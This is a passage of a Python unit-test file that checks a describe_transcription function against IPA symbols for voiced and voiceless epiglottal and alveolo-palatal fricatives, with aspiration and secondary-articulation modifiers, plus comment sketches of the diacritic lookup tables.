def test_ʜʰ_is_the_representation_of_the_voiceless_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰ_is_the_representation_of_the_voiceless_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰ_is_the_representation_of_the_voiceless_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized epiglottal fricative pulmonic egressive consonant
def test_ʜʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰʷ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized epiglottal fricative pulmonic egressive consonant
def test_ʜʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰʲ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized epiglottal fricative pulmonic egressive consonant
def test_ʜʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰˠ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized epiglottal fricative pulmonic egressive consonant
def test_ʜʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʰˤ")
self.assertEqual(actual, expected)
def test_ʢ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʢ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced epiglottal fricative pulmonic egressive consonant
def test_ʢ_is_the_representation_of_the_voiced_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ")
self.assertEqual(actual, expected)
def test_ʜ̬_is_the_representation_of_the_voiced_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬")
self.assertEqual(actual, expected)
# voiced labialized epiglottal fricative pulmonic egressive consonant
def test_ʢʷ_is_the_representation_of_the_voiced_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʷ")
self.assertEqual(actual, expected)
def test_ʜ̬ʷ_is_the_representation_of_the_voiced_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized epiglottal fricative pulmonic egressive consonant
def test_ʢʲ_is_the_representation_of_the_voiced_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʲ")
self.assertEqual(actual, expected)
def test_ʜ̬ʲ_is_the_representation_of_the_voiced_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized epiglottal fricative pulmonic egressive consonant
def test_ʢˠ_is_the_representation_of_the_voiced_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢˠ")
self.assertEqual(actual, expected)
def test_ʜ̬ˠ_is_the_representation_of_the_voiced_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized epiglottal fricative pulmonic egressive consonant
def test_ʢˤ_is_the_representation_of_the_voiced_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢˤ")
self.assertEqual(actual, expected)
def test_ʜ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated epiglottal fricative pulmonic egressive consonant
def test_ʢʰ_is_the_representation_of_the_voiced_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰ_is_the_representation_of_the_voiced_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰ_is_the_representation_of_the_voiced_aspirated_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized epiglottal fricative pulmonic egressive consonant
def test_ʢʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰʷ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized epiglottal fricative pulmonic egressive consonant
def test_ʢʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰʲ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized epiglottal fricative pulmonic egressive consonant
def test_ʢʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰˠ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized epiglottal fricative pulmonic egressive consonant
def test_ʢʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢʰˤ")
self.assertEqual(actual, expected)
def test_ʢ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ʜ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̬ʰˤ")
self.assertEqual(actual, expected)
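# The cases above accept either the combining ring above (U+030A) or the
# combining ring below (U+0325) as the voiceless diacritic, and the
# combining caron below (U+032C) as the voiced diacritic. A sketch of that
# mapping as a lookup table; the name VOICING_DIACRITICS is illustrative
# and not part of the module under test:
VOICING_DIACRITICS = {
    "\u030a": "voiceless",  # combining ring above, as in ʜ̊
    "\u0325": "voiceless",  # combining ring below, as in ʜ̥
    "\u032c": "voiced",     # combining caron below, as in ʜ̬
}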
# voiceless alveolo-palatal fricative pulmonic egressive consonant
def test_ɕ_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ")
self.assertEqual(actual, expected)
def test_ɕ̊_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊")
self.assertEqual(actual, expected)
def test_ɕ̥_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥")
self.assertEqual(actual, expected)
def test_ʑ̊_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊")
self.assertEqual(actual, expected)
def test_ʑ̥_is_the_representation_of_the_voiceless_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʷ")
self.assertEqual(actual, expected)
def test_ɕ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊ʷ")
self.assertEqual(actual, expected)
def test_ɕ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥ʷ")
self.assertEqual(actual, expected)
def test_ʑ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʷ")
self.assertEqual(actual, expected)
def test_ʑ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʲ")
self.assertEqual(actual, expected)
def test_ɕ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊ʲ")
self.assertEqual(actual, expected)
def test_ɕ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥ʲ")
self.assertEqual(actual, expected)
def test_ʑ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʲ")
self.assertEqual(actual, expected)
def test_ʑ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕˠ")
self.assertEqual(actual, expected)
def test_ɕ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊ˠ")
self.assertEqual(actual, expected)
def test_ɕ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥ˠ")
self.assertEqual(actual, expected)
def test_ʑ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ˠ")
self.assertEqual(actual, expected)
def test_ʑ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕˤ")
self.assertEqual(actual, expected)
def test_ɕ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̊ˤ")
self.assertEqual(actual, expected)
def test_ɕ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̥ˤ")
self.assertEqual(actual, expected)
def test_ʑ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ˤ")
self.assertEqual(actual, expected)
def test_ʑ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰ_is_the_representation_of_the_voiceless_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰʷ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰʲ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰˠ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant
def test_ɕʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕʰˤ")
self.assertEqual(actual, expected)
def test_ʑ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʑ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̊ʰˤ")
self.assertEqual(actual, expected)
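# Every secondary articulation exercised in these tests is marked by a
# superscript modifier letter appended after the base symbol (and after
# any aspiration mark). A sketch of that mapping; the names below are
# illustrative, not part of the module under test:
SECONDARY_ARTICULATIONS = {
    "\u02b7": "labialized",      # ʷ
    "\u02b2": "palatalized",     # ʲ
    "\u02e0": "velarized",       # ˠ
    "\u02e4": "pharyngealized",  # ˤ
}
ASPIRATION_MARK = "\u02b0"  # ʰ, rendered as "aspirated" in the descriptions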
# voiced alveolo-palatal fricative pulmonic egressive consonant
def test_ʑ_is_the_representation_of_the_voiced_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ")
self.assertEqual(actual, expected)
def test_ɕ̬_is_the_representation_of_the_voiced_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬")
self.assertEqual(actual, expected)
# voiced labialized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʷ_is_the_representation_of_the_voiced_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʷ")
self.assertEqual(actual, expected)
def test_ɕ̬ʷ_is_the_representation_of_the_voiced_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʲ_is_the_representation_of_the_voiced_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʲ")
self.assertEqual(actual, expected)
def test_ɕ̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑˠ_is_the_representation_of_the_voiced_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑˠ")
self.assertEqual(actual, expected)
def test_ɕ̬ˠ_is_the_representation_of_the_voiced_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑˤ_is_the_representation_of_the_voiced_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑˤ")
self.assertEqual(actual, expected)
def test_ɕ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʰ_is_the_representation_of_the_voiced_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰʷ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰʲ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolo-palatal fricative pulmonic egressive consonant
